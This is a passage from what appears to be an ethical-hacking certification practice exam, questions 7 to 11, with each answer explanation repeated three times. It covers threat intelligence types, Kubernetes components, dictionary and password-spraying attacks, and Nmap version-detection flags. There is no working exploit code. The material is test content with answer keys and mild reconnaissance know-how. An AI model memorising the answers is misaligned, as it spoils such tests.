approach based on certificate authority and which was added to PGP implementations later. Current versions of PGP encryption include options through an automated key management server. S/MIME https://en.wikipedia.org/wiki/S/MIME S/MIME (Secure/Multipurpose Internet Mail Extensions) is a standard for public key encryption and signing of MIME data. S/MIME is on an IETF standards track and defined in a number of documents, most importantly RFC 3369, 3370, 3850 and 3851. It was originally developed by RSA Data Security and the original specification used the IETF MIME specification with the de facto industry standard PKCS#7 secure message format. Change control to S/MIME has since been vested in the IETF and the specification is now layered on Cryptographic Message Syntax (CMS), an IETF specification that is identical in most respects with PKCS #7. S/MIME functionality is built into the majority of modern email software and interoperates between them. Since it is built on CMS, MIME can also hold an advanced digital signature.
Question 7 of 65
7. Question
You need to protect the company‘s network from imminent threats. To complete this task, you will enter information about threats into the security devices in a digital format to block and identify inbound and outbound malicious traffic entering the company‘s network. Which of the following types of threat intelligence will you use?
Correct
https://info-savvy.com/types-of-threat-intelligence/ Technical threat intelligence. With technical cyber intelligence, information about the attackers resources such as command and control channel, tools are collected. For example, it focuses on phishing emails or technical tips that indicate the cybersecurity threat to fraudulent URLs. The aim is to collect information about specific IOCs (IP address, phishing email header, hash checksum). This type of threat intelligence is important because it allows to analyze attacks. However, the value of technical threat intelligence is short-lived, as hackers often change their tactics. IOCs that are detected and analyzed at the right time are important. Tactical intelligence is used by employees in the SOC team. Thanks to the information obtained here, new rules are written in the current security products of the organization (such as IDS / IPs, firewall, endpoint security system). Also, suspicious IPs are detected by spam emails. The information obtained here feeds the products of the organization directly. Incorrect answers: Strategic threat intelligence Strategic Threat Intelligence provides a high level of information on the cybersecurity posture, threats, financial impact of cyber activities, attack trends, and their impact on business decisions. The information obtained can be used by senior executives at the company. The purpose of Strategic Threat Intelligence is to manage existing cyber risks and unknown future risks. This intelligence offers a risk-based approach. It focuses on the effects and possibilities of risks. The information provided here is suitable for long-term use. It helps in making strategic business decisions. For example, it can evaluate these results when deciding on budget / employee / product balance in protecting critical assets. Data collection sources for strategic intelligence are also high-level sources: OSINT, CTI vendors, and ISAO / ISACS. Operational threat intelligence Operational threat intelligence provides information to the managers of the defense teams about the specific threat to the company. People like head of network defenders, fraud detection manager incident response team manager understand the attack effect With incoming intelligence, it is attempted to identify the threat actor and to determine his capabilities and threatened IT assets. In operational threat intelligence, information is collected through hacker forums, chat rooms, social media, and the current cyber attack. The attack that may come with the collected information is estimated, and protection planning is issued. Tactical threat intelligence Tactical threat intelligence provides detailed information on the tactics, techniques, and procedures of threat actors. It is predominantly for a technical audience and helps them to understand how their networks are attacked based on the latest methods attackers used to achieve their goals. It provides information that can be consumed by security experts such as IT managers, SOC managers, NOC managers. These employees use tactical cyber intelligence to understand the technical capability and objectives of the offensive and identify their detection and mitigation strategies. Tactical cyber intelligence is collected through malware and incident reports, attack group reports, human Intelligence, and campaign reports.
Incorrect
https://info-savvy.com/types-of-threat-intelligence/ Technical threat intelligence. With technical cyber intelligence, information about the attackers resources such as command and control channel, tools are collected. For example, it focuses on phishing emails or technical tips that indicate the cybersecurity threat to fraudulent URLs. The aim is to collect information about specific IOCs (IP address, phishing email header, hash checksum). This type of threat intelligence is important because it allows to analyze attacks. However, the value of technical threat intelligence is short-lived, as hackers often change their tactics. IOCs that are detected and analyzed at the right time are important. Tactical intelligence is used by employees in the SOC team. Thanks to the information obtained here, new rules are written in the current security products of the organization (such as IDS / IPs, firewall, endpoint security system). Also, suspicious IPs are detected by spam emails. The information obtained here feeds the products of the organization directly. Incorrect answers: Strategic threat intelligence Strategic Threat Intelligence provides a high level of information on the cybersecurity posture, threats, financial impact of cyber activities, attack trends, and their impact on business decisions. The information obtained can be used by senior executives at the company. The purpose of Strategic Threat Intelligence is to manage existing cyber risks and unknown future risks. This intelligence offers a risk-based approach. It focuses on the effects and possibilities of risks. The information provided here is suitable for long-term use. It helps in making strategic business decisions. For example, it can evaluate these results when deciding on budget / employee / product balance in protecting critical assets. Data collection sources for strategic intelligence are also high-level sources: OSINT, CTI vendors, and ISAO / ISACS. Operational threat intelligence Operational threat intelligence provides information to the managers of the defense teams about the specific threat to the company. People like head of network defenders, fraud detection manager incident response team manager understand the attack effect With incoming intelligence, it is attempted to identify the threat actor and to determine his capabilities and threatened IT assets. In operational threat intelligence, information is collected through hacker forums, chat rooms, social media, and the current cyber attack. The attack that may come with the collected information is estimated, and protection planning is issued. Tactical threat intelligence Tactical threat intelligence provides detailed information on the tactics, techniques, and procedures of threat actors. It is predominantly for a technical audience and helps them to understand how their networks are attacked based on the latest methods attackers used to achieve their goals. It provides information that can be consumed by security experts such as IT managers, SOC managers, NOC managers. These employees use tactical cyber intelligence to understand the technical capability and objectives of the offensive and identify their detection and mitigation strategies. Tactical cyber intelligence is collected through malware and incident reports, attack group reports, human Intelligence, and campaign reports.
Unattempted
https://info-savvy.com/types-of-threat-intelligence/ Technical threat intelligence. With technical cyber intelligence, information about the attackers resources such as command and control channel, tools are collected. For example, it focuses on phishing emails or technical tips that indicate the cybersecurity threat to fraudulent URLs. The aim is to collect information about specific IOCs (IP address, phishing email header, hash checksum). This type of threat intelligence is important because it allows to analyze attacks. However, the value of technical threat intelligence is short-lived, as hackers often change their tactics. IOCs that are detected and analyzed at the right time are important. Tactical intelligence is used by employees in the SOC team. Thanks to the information obtained here, new rules are written in the current security products of the organization (such as IDS / IPs, firewall, endpoint security system). Also, suspicious IPs are detected by spam emails. The information obtained here feeds the products of the organization directly. Incorrect answers: Strategic threat intelligence Strategic Threat Intelligence provides a high level of information on the cybersecurity posture, threats, financial impact of cyber activities, attack trends, and their impact on business decisions. The information obtained can be used by senior executives at the company. The purpose of Strategic Threat Intelligence is to manage existing cyber risks and unknown future risks. This intelligence offers a risk-based approach. It focuses on the effects and possibilities of risks. The information provided here is suitable for long-term use. It helps in making strategic business decisions. For example, it can evaluate these results when deciding on budget / employee / product balance in protecting critical assets. Data collection sources for strategic intelligence are also high-level sources: OSINT, CTI vendors, and ISAO / ISACS. Operational threat intelligence Operational threat intelligence provides information to the managers of the defense teams about the specific threat to the company. People like head of network defenders, fraud detection manager incident response team manager understand the attack effect With incoming intelligence, it is attempted to identify the threat actor and to determine his capabilities and threatened IT assets. In operational threat intelligence, information is collected through hacker forums, chat rooms, social media, and the current cyber attack. The attack that may come with the collected information is estimated, and protection planning is issued. Tactical threat intelligence Tactical threat intelligence provides detailed information on the tactics, techniques, and procedures of threat actors. It is predominantly for a technical audience and helps them to understand how their networks are attacked based on the latest methods attackers used to achieve their goals. It provides information that can be consumed by security experts such as IT managers, SOC managers, NOC managers. These employees use tactical cyber intelligence to understand the technical capability and objectives of the offensive and identify their detection and mitigation strategies. Tactical cyber intelligence is collected through malware and incident reports, attack group reports, human Intelligence, and campaign reports.
Question 8 of 65
8. Question
Which of the following is a Kubernetes component that can assign nodes based on the overall resource requirement, data locality, software/hardware/policy restrictions, and internal workload interventions?
Correct
According to EC-Council courseware: Kube-scheduler: Kube-scheduler is a master component that scans newly generated pods and allocates a node for them. It assigns the nodes based on factors such as the overall resource requirement, data locality, software/hardware/policy restrictions, and internal workload interventions. Kube-apiserver: The API server is an integral part of the Kubernetes control panel Module 19 Page 2834 that responds to all API requests. It serves as a front-end utility for the control panel and it is the only component that interacts with the etcd cluster and ensures data storage. Kube-controller-manager: Kube-controller-manager is a master component that runs controllers. Controllers are generally individual processes (e.g., node controller, endpoint controller, replication controller, service account and token controller) but are combined into a single binary and run together in a single process to reduce complexity. cloud-controller-manager: This is the master component used to run controllers that communicate with cloud providers. Cloud-controller-manager enables the Kubernetes code and cloud provider code to evolve separately.
Incorrect
According to EC-Council courseware: Kube-scheduler: Kube-scheduler is a master component that scans newly generated pods and allocates a node for them. It assigns the nodes based on factors such as the overall resource requirement, data locality, software/hardware/policy restrictions, and internal workload interventions. Kube-apiserver: The API server is an integral part of the Kubernetes control panel Module 19 Page 2834 that responds to all API requests. It serves as a front-end utility for the control panel and it is the only component that interacts with the etcd cluster and ensures data storage. Kube-controller-manager: Kube-controller-manager is a master component that runs controllers. Controllers are generally individual processes (e.g., node controller, endpoint controller, replication controller, service account and token controller) but are combined into a single binary and run together in a single process to reduce complexity. cloud-controller-manager: This is the master component used to run controllers that communicate with cloud providers. Cloud-controller-manager enables the Kubernetes code and cloud provider code to evolve separately.
Unattempted
According to EC-Council courseware: Kube-scheduler: Kube-scheduler is a master component that scans newly generated pods and allocates a node for them. It assigns the nodes based on factors such as the overall resource requirement, data locality, software/hardware/policy restrictions, and internal workload interventions. Kube-apiserver: The API server is an integral part of the Kubernetes control panel Module 19 Page 2834 that responds to all API requests. It serves as a front-end utility for the control panel and it is the only component that interacts with the etcd cluster and ensures data storage. Kube-controller-manager: Kube-controller-manager is a master component that runs controllers. Controllers are generally individual processes (e.g., node controller, endpoint controller, replication controller, service account and token controller) but are combined into a single binary and run together in a single process to reduce complexity. cloud-controller-manager: This is the master component used to run controllers that communicate with cloud providers. Cloud-controller-manager enables the Kubernetes code and cloud provider code to evolve separately.
Question 9 of 65
9. Question
Ivan, a black hat hacker, got the username from the target environment. In conditions of limited time, he decides to use a list of common passwords, which he will pass as an argument to the hacking tool. Which of the following is the method of attack that Ivan uses?
Correct
https://en.wikipedia.org/wiki/Dictionary_attack A dictionary attack is a form of brute force attack technique for defeating a cipher or authentication mechanism by trying to determine its decryption key or passphrase by trying thousands or millions of likely possibilities, such as words in a dictionary or previously used passwords, often from lists obtained from past security breaches. A dictionary attack is based on trying all the strings in a pre-arranged listing. Such attacks originally used words found in a dictionary (hence the phrase dictionary attack); however, now there are much larger lists available on the open Internet containing hundreds of millions of passwords recovered from past data breaches. There is also cracking software that can use such lists and produce common variations, such as substituting numbers for similar-looking letters. A dictionary attack tries only those possibilities which are deemed most likely to succeed. Dictionary attacks often succeed because many people have a tendency to choose short passwords that are ordinary words or common passwords; or variants obtained, for example, by appending a digit or punctuation character. Dictionary attacks are often successful since many commonly used password creation techniques are covered by the available lists, combined with cracking software pattern generation. A safer approach is to randomly generate a long password (15 letters or more) or a multiword passphrase, using a password manager program or manually typing a password. Below you will find several tools that can use this type of attack: John the Ripper: https://en.wikipedia.org/wiki/John_the_Ripper Aircrack-ng: https://ophcrack.sourceforge.io/ Hashcat: https://en.wikipedia.org/wiki/Hashcat Incorrect answers: Known plaintext attack https://en.wikipedia.org/wiki/Known-plaintext_attack The known-plaintext attack (KPA) is a type of cryptanalysis in which standard pieces are present in the ciphertext, the meaning of which is known to the analyst in advance. During the Second World War, English cryptanalysts called such pieces “hints“. Smudge attack https://en.wikipedia.org/wiki/Smudge_attack A smudge attack is an information extraction attack that discerns the password input of a touchscreen device such as a cell phone or tablet computer from fingerprint smudges. A team of researchers at the University of Pennsylvania were the first to investigate this type of attack in 2010. An attack occurs when an unauthorized user is in possession or is nearby the device of interest. The attacker relies on detecting the oily smudges produced and left behind by the user‘s fingers to find the pattern or code needed to access the device and its contents. Simple cameras, lights, fingerprint powder, and image processing software can be used to capture the fingerprint deposits created when the user unlocks their device. Under proper lighting and camera settings, the finger smudges can be easily detected, and the heaviest smudges can be used to infer the most frequent input swipes or taps from the user. Password spraying attack Password spraying is a type of brute force attack. In this attack, an attacker will brute force logins based on list of usernames with default passwords on the application. For example, an attacker will use one password (say, Secure@123) against many different accounts on the application to avoid account lockouts that would normally occur when brute forcing a single account with many passwords.
Incorrect
https://en.wikipedia.org/wiki/Dictionary_attack A dictionary attack is a form of brute force attack technique for defeating a cipher or authentication mechanism by trying to determine its decryption key or passphrase by trying thousands or millions of likely possibilities, such as words in a dictionary or previously used passwords, often from lists obtained from past security breaches. A dictionary attack is based on trying all the strings in a pre-arranged listing. Such attacks originally used words found in a dictionary (hence the phrase dictionary attack); however, now there are much larger lists available on the open Internet containing hundreds of millions of passwords recovered from past data breaches. There is also cracking software that can use such lists and produce common variations, such as substituting numbers for similar-looking letters. A dictionary attack tries only those possibilities which are deemed most likely to succeed. Dictionary attacks often succeed because many people have a tendency to choose short passwords that are ordinary words or common passwords; or variants obtained, for example, by appending a digit or punctuation character. Dictionary attacks are often successful since many commonly used password creation techniques are covered by the available lists, combined with cracking software pattern generation. A safer approach is to randomly generate a long password (15 letters or more) or a multiword passphrase, using a password manager program or manually typing a password. Below you will find several tools that can use this type of attack: John the Ripper: https://en.wikipedia.org/wiki/John_the_Ripper Aircrack-ng: https://ophcrack.sourceforge.io/ Hashcat: https://en.wikipedia.org/wiki/Hashcat Incorrect answers: Known plaintext attack https://en.wikipedia.org/wiki/Known-plaintext_attack The known-plaintext attack (KPA) is a type of cryptanalysis in which standard pieces are present in the ciphertext, the meaning of which is known to the analyst in advance. During the Second World War, English cryptanalysts called such pieces “hints“. Smudge attack https://en.wikipedia.org/wiki/Smudge_attack A smudge attack is an information extraction attack that discerns the password input of a touchscreen device such as a cell phone or tablet computer from fingerprint smudges. A team of researchers at the University of Pennsylvania were the first to investigate this type of attack in 2010. An attack occurs when an unauthorized user is in possession or is nearby the device of interest. The attacker relies on detecting the oily smudges produced and left behind by the user‘s fingers to find the pattern or code needed to access the device and its contents. Simple cameras, lights, fingerprint powder, and image processing software can be used to capture the fingerprint deposits created when the user unlocks their device. Under proper lighting and camera settings, the finger smudges can be easily detected, and the heaviest smudges can be used to infer the most frequent input swipes or taps from the user. Password spraying attack Password spraying is a type of brute force attack. In this attack, an attacker will brute force logins based on list of usernames with default passwords on the application. For example, an attacker will use one password (say, Secure@123) against many different accounts on the application to avoid account lockouts that would normally occur when brute forcing a single account with many passwords.
Unattempted
https://en.wikipedia.org/wiki/Dictionary_attack A dictionary attack is a form of brute force attack technique for defeating a cipher or authentication mechanism by trying to determine its decryption key or passphrase by trying thousands or millions of likely possibilities, such as words in a dictionary or previously used passwords, often from lists obtained from past security breaches. A dictionary attack is based on trying all the strings in a pre-arranged listing. Such attacks originally used words found in a dictionary (hence the phrase dictionary attack); however, now there are much larger lists available on the open Internet containing hundreds of millions of passwords recovered from past data breaches. There is also cracking software that can use such lists and produce common variations, such as substituting numbers for similar-looking letters. A dictionary attack tries only those possibilities which are deemed most likely to succeed. Dictionary attacks often succeed because many people have a tendency to choose short passwords that are ordinary words or common passwords; or variants obtained, for example, by appending a digit or punctuation character. Dictionary attacks are often successful since many commonly used password creation techniques are covered by the available lists, combined with cracking software pattern generation. A safer approach is to randomly generate a long password (15 letters or more) or a multiword passphrase, using a password manager program or manually typing a password. Below you will find several tools that can use this type of attack: John the Ripper: https://en.wikipedia.org/wiki/John_the_Ripper Aircrack-ng: https://ophcrack.sourceforge.io/ Hashcat: https://en.wikipedia.org/wiki/Hashcat Incorrect answers: Known plaintext attack https://en.wikipedia.org/wiki/Known-plaintext_attack The known-plaintext attack (KPA) is a type of cryptanalysis in which standard pieces are present in the ciphertext, the meaning of which is known to the analyst in advance. During the Second World War, English cryptanalysts called such pieces “hints“. Smudge attack https://en.wikipedia.org/wiki/Smudge_attack A smudge attack is an information extraction attack that discerns the password input of a touchscreen device such as a cell phone or tablet computer from fingerprint smudges. A team of researchers at the University of Pennsylvania were the first to investigate this type of attack in 2010. An attack occurs when an unauthorized user is in possession or is nearby the device of interest. The attacker relies on detecting the oily smudges produced and left behind by the user‘s fingers to find the pattern or code needed to access the device and its contents. Simple cameras, lights, fingerprint powder, and image processing software can be used to capture the fingerprint deposits created when the user unlocks their device. Under proper lighting and camera settings, the finger smudges can be easily detected, and the heaviest smudges can be used to infer the most frequent input swipes or taps from the user. Password spraying attack Password spraying is a type of brute force attack. In this attack, an attacker will brute force logins based on list of usernames with default passwords on the application. For example, an attacker will use one password (say, Secure@123) against many different accounts on the application to avoid account lockouts that would normally occur when brute forcing a single account with many passwords.
Question 10 of 65
10. Question
Assume you used Nmap, and after applying a command, you got the following output: Starting Nmap X.XX (http://nmap.org) at XXX-XX-XX XX:XX EDT Nmap scan report for 192.168.1.42 Host is up (0.00023s latency). Not shown: 932 filtered ports, 56 closed ports PORT STATE SERVICE – 21/Rep open ftp 22/tcp open ssh 25/tcp open smtp 53/tcp open domain 80/tcp open http 110/tcp open pop3 143/tcp open imap 443/tcp open https 465/tcp open smtps 587/tcp open submission 993/tcp open imaps 995/tcp open pop3s Nmap done: 1 IP address (1 host up) scanned in 3.90 seconds Which of the following command-line parameter could you use to determine the service protocol, the application name, the version number, hostname, device type?
Correct
https://nmap.org/book/man-version-detection.html Point Nmap at a remote machine and it might tell you that ports 25/tcp, 80/tcp, and 53/udp are open. Using its nmap-services database of about 2,200 well-known services, Nmap would report that those ports probably correspond to a mail server (SMTP), web server (HTTP), and name server (DNS) respectively. This lookup is usually accuratethe vast majority of daemons listening on TCP port 25 are, in fact, mail servers. However, you should not bet your security on this! People can and do run services on strange ports. Even if Nmap is right, and the hypothetical server above is running SMTP, HTTP, and DNS servers, that is not a lot of information. When doing vulnerability assessments (or even simple network inventories) of your companies or clients, you really want to know which mail and DNS servers and versions are running. Having an accurate version number helps dramatically in determining which exploits a server is vulnerable to. Version detection helps you obtain this information. After TCP and/or UDP ports are discovered using one of the other scan methods, version detection interrogates those ports to determine more about what is actually running. The nmap-service-probes database contains probes for querying various services and match expressions to recognize and parse responses. Nmap tries to determine the service protocol (e.g. FTP, SSH, Telnet, HTTP), the application name (e.g. ISC BIND, Apache httpd, Solaris telnetd), the version number, hostname, device type (e.g. printer, router), the OS family (e.g. Windows, Linux). When possible, Nmap also gets the Common Platform Enumeration (CPE) representation of this information. Sometimes miscellaneous details like whether an X server is open to connections, the SSH protocol version, or the KaZaA user name, are available. Of course, most services don‘t provide all of this information. If Nmap was compiled with OpenSSL support, it will connect to SSL servers to deduce the service listening behind that encryption layer. Some UDP ports are left in the open|filtered state after a UDP port scan is unable to determine whether the port is open or filtered. Version detection will try to elicit a response from these ports (just as it does with open ports), and change the state to open if it succeeds. open|filtered TCP ports are treated the same way. Note that the Nmap -A option enables version detection among other things. When RPC services are discovered, the Nmap RPC grinder is automatically used to determine the RPC program and version numbers. It takes all the TCP/UDP ports detected as RPC and floods them with SunRPC program NULL commands in an attempt to determine whether they are RPC ports, and if so, what program and version number they serve up. Thus you can effectively obtain the same info as rpcinfo -p even if the target‘s portmapper is behind a firewall (or protected by TCP wrappers). Decoys do not currently work with RPC scan. When Nmap receives responses from a service but cannot match them to its database, it prints out a special fingerprint and a URL for you to submit it to if you know for sure what is running on the port. Please take a couple minutes to make the submission so that your find can benefit everyone. Thanks to these submissions, Nmap has about 6,500 pattern matches for more than 650 protocols such as SMTP, FTP, HTTP, etc. -sV (Version detection) Enables version detection, as discussed above. Alternatively, you can use -A, which enables version detection among other things. Incorrect answers: -sS (TCP SYN scan) SYN scan is the default and most popular scan option for good reasons. It can be performed quickly, scanning thousands of ports per second on a fast network not hampered by restrictive firewalls. It is also relatively unobtrusive and stealthy since it never completes TCP connections. SYN scan works against any compliant TCP stack rather than depending on idiosyncrasies of specific platforms as Nmap‘s FIN/NULL/Xmas, Maimon and idle scans do. It also allows clear, reliable differentiation between the open, closed, and filtered states. -sT (TCP connect scan) TCP connect scan is the default TCP scan type when SYN scan is not an option. This is the case when a user does not have raw packet privileges. Instead of writing raw packets as most other scan types do, Nmap asks the underlying operating system to establish a connection with the target machine and port by issuing the connect system call. This is the same high-level system call that web browsers, P2P clients, and most other network-enabled applications use to establish a connection. It is part of a programming interface known as the Berkeley Sockets API. Rather than read raw packet responses off the wire, Nmap uses this API to obtain status information on each connection attempt. -sY (SCTP INIT scan) SCTP is a relatively new alternative to the TCP and UDP protocols, combining most characteristics of TCP and UDP, and also adding new features like multi-homing and multi-streaming. It is mostly being used for SS7/SIGTRAN related services but has the potential to be used for other applications as well. SCTP INIT scan is the SCTP equivalent of a TCP SYN scan. It can be performed quickly, scanning thousands of ports per second on a fast network not hampered by restrictive firewalls. Like SYN scan, INIT scan is relatively unobtrusive and stealthy, since it never completes SCTP associations. It also allows clear, reliable differentiation between the open, closed, and filtered states.
Incorrect
https://nmap.org/book/man-version-detection.html Point Nmap at a remote machine and it might tell you that ports 25/tcp, 80/tcp, and 53/udp are open. Using its nmap-services database of about 2,200 well-known services, Nmap would report that those ports probably correspond to a mail server (SMTP), web server (HTTP), and name server (DNS) respectively. This lookup is usually accuratethe vast majority of daemons listening on TCP port 25 are, in fact, mail servers. However, you should not bet your security on this! People can and do run services on strange ports. Even if Nmap is right, and the hypothetical server above is running SMTP, HTTP, and DNS servers, that is not a lot of information. When doing vulnerability assessments (or even simple network inventories) of your companies or clients, you really want to know which mail and DNS servers and versions are running. Having an accurate version number helps dramatically in determining which exploits a server is vulnerable to. Version detection helps you obtain this information. After TCP and/or UDP ports are discovered using one of the other scan methods, version detection interrogates those ports to determine more about what is actually running. The nmap-service-probes database contains probes for querying various services and match expressions to recognize and parse responses. Nmap tries to determine the service protocol (e.g. FTP, SSH, Telnet, HTTP), the application name (e.g. ISC BIND, Apache httpd, Solaris telnetd), the version number, hostname, device type (e.g. printer, router), the OS family (e.g. Windows, Linux). When possible, Nmap also gets the Common Platform Enumeration (CPE) representation of this information. Sometimes miscellaneous details like whether an X server is open to connections, the SSH protocol version, or the KaZaA user name, are available. Of course, most services don‘t provide all of this information. If Nmap was compiled with OpenSSL support, it will connect to SSL servers to deduce the service listening behind that encryption layer. Some UDP ports are left in the open|filtered state after a UDP port scan is unable to determine whether the port is open or filtered. Version detection will try to elicit a response from these ports (just as it does with open ports), and change the state to open if it succeeds. open|filtered TCP ports are treated the same way. Note that the Nmap -A option enables version detection among other things. When RPC services are discovered, the Nmap RPC grinder is automatically used to determine the RPC program and version numbers. It takes all the TCP/UDP ports detected as RPC and floods them with SunRPC program NULL commands in an attempt to determine whether they are RPC ports, and if so, what program and version number they serve up. Thus you can effectively obtain the same info as rpcinfo -p even if the target‘s portmapper is behind a firewall (or protected by TCP wrappers). Decoys do not currently work with RPC scan. When Nmap receives responses from a service but cannot match them to its database, it prints out a special fingerprint and a URL for you to submit it to if you know for sure what is running on the port. Please take a couple minutes to make the submission so that your find can benefit everyone. Thanks to these submissions, Nmap has about 6,500 pattern matches for more than 650 protocols such as SMTP, FTP, HTTP, etc. -sV (Version detection) Enables version detection, as discussed above. Alternatively, you can use -A, which enables version detection among other things. Incorrect answers: -sS (TCP SYN scan) SYN scan is the default and most popular scan option for good reasons. It can be performed quickly, scanning thousands of ports per second on a fast network not hampered by restrictive firewalls. It is also relatively unobtrusive and stealthy since it never completes TCP connections. SYN scan works against any compliant TCP stack rather than depending on idiosyncrasies of specific platforms as Nmap‘s FIN/NULL/Xmas, Maimon and idle scans do. It also allows clear, reliable differentiation between the open, closed, and filtered states. -sT (TCP connect scan) TCP connect scan is the default TCP scan type when SYN scan is not an option. This is the case when a user does not have raw packet privileges. Instead of writing raw packets as most other scan types do, Nmap asks the underlying operating system to establish a connection with the target machine and port by issuing the connect system call. This is the same high-level system call that web browsers, P2P clients, and most other network-enabled applications use to establish a connection. It is part of a programming interface known as the Berkeley Sockets API. Rather than read raw packet responses off the wire, Nmap uses this API to obtain status information on each connection attempt. -sY (SCTP INIT scan) SCTP is a relatively new alternative to the TCP and UDP protocols, combining most characteristics of TCP and UDP, and also adding new features like multi-homing and multi-streaming. It is mostly being used for SS7/SIGTRAN related services but has the potential to be used for other applications as well. SCTP INIT scan is the SCTP equivalent of a TCP SYN scan. It can be performed quickly, scanning thousands of ports per second on a fast network not hampered by restrictive firewalls. Like SYN scan, INIT scan is relatively unobtrusive and stealthy, since it never completes SCTP associations. It also allows clear, reliable differentiation between the open, closed, and filtered states.
Unattempted
https://nmap.org/book/man-version-detection.html Point Nmap at a remote machine and it might tell you that ports 25/tcp, 80/tcp, and 53/udp are open. Using its nmap-services database of about 2,200 well-known services, Nmap would report that those ports probably correspond to a mail server (SMTP), web server (HTTP), and name server (DNS) respectively. This lookup is usually accuratethe vast majority of daemons listening on TCP port 25 are, in fact, mail servers. However, you should not bet your security on this! People can and do run services on strange ports. Even if Nmap is right, and the hypothetical server above is running SMTP, HTTP, and DNS servers, that is not a lot of information. When doing vulnerability assessments (or even simple network inventories) of your companies or clients, you really want to know which mail and DNS servers and versions are running. Having an accurate version number helps dramatically in determining which exploits a server is vulnerable to. Version detection helps you obtain this information. After TCP and/or UDP ports are discovered using one of the other scan methods, version detection interrogates those ports to determine more about what is actually running. The nmap-service-probes database contains probes for querying various services and match expressions to recognize and parse responses. Nmap tries to determine the service protocol (e.g. FTP, SSH, Telnet, HTTP), the application name (e.g. ISC BIND, Apache httpd, Solaris telnetd), the version number, hostname, device type (e.g. printer, router), the OS family (e.g. Windows, Linux). When possible, Nmap also gets the Common Platform Enumeration (CPE) representation of this information. Sometimes miscellaneous details like whether an X server is open to connections, the SSH protocol version, or the KaZaA user name, are available. Of course, most services don‘t provide all of this information. If Nmap was compiled with OpenSSL support, it will connect to SSL servers to deduce the service listening behind that encryption layer. Some UDP ports are left in the open|filtered state after a UDP port scan is unable to determine whether the port is open or filtered. Version detection will try to elicit a response from these ports (just as it does with open ports), and change the state to open if it succeeds. open|filtered TCP ports are treated the same way. Note that the Nmap -A option enables version detection among other things. When RPC services are discovered, the Nmap RPC grinder is automatically used to determine the RPC program and version numbers. It takes all the TCP/UDP ports detected as RPC and floods them with SunRPC program NULL commands in an attempt to determine whether they are RPC ports, and if so, what program and version number they serve up. Thus you can effectively obtain the same info as rpcinfo -p even if the target‘s portmapper is behind a firewall (or protected by TCP wrappers). Decoys do not currently work with RPC scan. When Nmap receives responses from a service but cannot match them to its database, it prints out a special fingerprint and a URL for you to submit it to if you know for sure what is running on the port. Please take a couple minutes to make the submission so that your find can benefit everyone. Thanks to these submissions, Nmap has about 6,500 pattern matches for more than 650 protocols such as SMTP, FTP, HTTP, etc. -sV (Version detection) Enables version detection, as discussed above. Alternatively, you can use -A, which enables version detection among other things. Incorrect answers: -sS (TCP SYN scan) SYN scan is the default and most popular scan option for good reasons. It can be performed quickly, scanning thousands of ports per second on a fast network not hampered by restrictive firewalls. It is also relatively unobtrusive and stealthy since it never completes TCP connections. SYN scan works against any compliant TCP stack rather than depending on idiosyncrasies of specific platforms as Nmap‘s FIN/NULL/Xmas, Maimon and idle scans do. It also allows clear, reliable differentiation between the open, closed, and filtered states. -sT (TCP connect scan) TCP connect scan is the default TCP scan type when SYN scan is not an option. This is the case when a user does not have raw packet privileges. Instead of writing raw packets as most other scan types do, Nmap asks the underlying operating system to establish a connection with the target machine and port by issuing the connect system call. This is the same high-level system call that web browsers, P2P clients, and most other network-enabled applications use to establish a connection. It is part of a programming interface known as the Berkeley Sockets API. Rather than read raw packet responses off the wire, Nmap uses this API to obtain status information on each connection attempt. -sY (SCTP INIT scan) SCTP is a relatively new alternative to the TCP and UDP protocols, combining most characteristics of TCP and UDP, and also adding new features like multi-homing and multi-streaming. It is mostly being used for SS7/SIGTRAN related services but has the potential to be used for other applications as well. SCTP INIT scan is the SCTP equivalent of a TCP SYN scan. It can be performed quickly, scanning thousands of ports per second on a fast network not hampered by restrictive firewalls. Like SYN scan, INIT scan is relatively unobtrusive and stealthy, since it never completes SCTP associations. It also allows clear, reliable differentiation between the open, closed, and filtered states.
Question 11 of 65
11. Question
The boss has instructed you to test the company‘s network from the attacker‘s point of view to find out what exploits and vulnerabilities are accessible to the outside world by using devices such as firewalls, routers, and servers. During this process, you should also external assessment estimates the threat of network security attacks external to the organization. What type of vulnerability assessment should you perform?
Correct
https://info-savvy.com/top-8-most-useful-vulnerability-assessments/ External Assessments External assessment assesses the network from a hackers point of view to find out what exploits and vulnerabilities are accessible to the outside world. These types of assessments use external devices like firewalls, routers, and servers. An external assessment estimates the threat of network security attacks external to the organization. it determines how secure the external network and firewall are. Incorrect answers: Host-based Assessments Host-based assessments are a type of security check that involves carrying out a configuration-level check through the command line. These assessments check the security of a particular network or server. Host-based scanners assess systems to identify vulnerabilities such as incorrect registry and file permissions, as well as software configuration errors. Host-based assessment can use many commercial and open-source scanning tools. Passive Assessments Passive assessments sniff the traffic present on the network to identify the active systems, network services, applications, and vulnerability assessments. Even passive assessments provide a list of the users who are recently using the network. Active Assessments Active evaluation is a type of vulnerability assessment that uses network scanners to scan the network to identify the hosts, services, and vulnerabilities present in that network. These network scanners have the capability to reduce the intrusiveness of the checks they perform.
Incorrect
https://info-savvy.com/top-8-most-useful-vulnerability-assessments/ External Assessments External assessment assesses the network from a hackers point of view to find out what exploits and vulnerabilities are accessible to the outside world. These types of assessments use external devices like firewalls, routers, and servers. An external assessment estimates the threat of network security attacks external to the organization. it determines how secure the external network and firewall are. Incorrect answers: Host-based Assessments Host-based assessments are a type of security check that involves carrying out a configuration-level check through the command line. These assessments check the security of a particular network or server. Host-based scanners assess systems to identify vulnerabilities such as incorrect registry and file permissions, as well as software configuration errors. Host-based assessment can use many commercial and open-source scanning tools. Passive Assessments Passive assessments sniff the traffic present on the network to identify the active systems, network services, applications, and vulnerability assessments. Even passive assessments provide a list of the users who are recently using the network. Active Assessments Active evaluation is a type of vulnerability assessment that uses network scanners to scan the network to identify the hosts, services, and vulnerabilities present in that network. These network scanners have the capability to reduce the intrusiveness of the checks they perform.
Unattempted
